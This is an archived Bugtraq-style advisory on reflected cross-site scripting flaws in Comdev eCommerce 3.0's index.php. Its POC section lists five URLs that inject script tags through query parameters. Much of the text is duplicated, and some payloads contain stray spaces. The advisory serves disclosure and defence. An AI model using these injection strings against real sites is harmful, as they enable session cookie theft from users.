Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
BID:12382
Info
Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 12382 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 27 2005 12:00AM |
| Updated: | Jan 27 2005 12:00AM |
| Credit: | Discovery is credited to SmOk3 <[email protected]>. |
| Vulnerable: |
Comdev Comdev eCommerce 3.0 |
| Not Vulnerable: | |
Discussion
Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.
Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks.
Comdev eCommerce 3.0 is reported prone to these issues. It is likely that previous versions are vulnerable as well.
Exploit / POC
Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=
An exploit is not required.
The following proof of concept examples are available:
index.php?product_id=477&pageactionprev=viewpricelist&sta rt=0"><script>alert(document.domain);</script>&category_id=&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id="><script>alert(document.d omain);</script>&keyword=
index.php?product_id=477&pageactionprev=viewpricelist&start=0&category_id=&keyword="><script>alert(document.domain);</script>
index.php?pageac tion=viewpricelist"><script>alert(document.domain);</script>
index.php?product_id=477"><script>alert(document.domain);</script>&pageactionprev=viewpricelist&start=0&cate gory_id=&keyword=
Solution / Fix
Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Comdev eCommerce INDEX.PHP Multiple Cross-Site Scripting Vulnerabilities
References:
References:
- Comdev eCommerce 3.0 SS#24012005 (SmOk3)
- Comdev eCommerce Product Page (Comdev)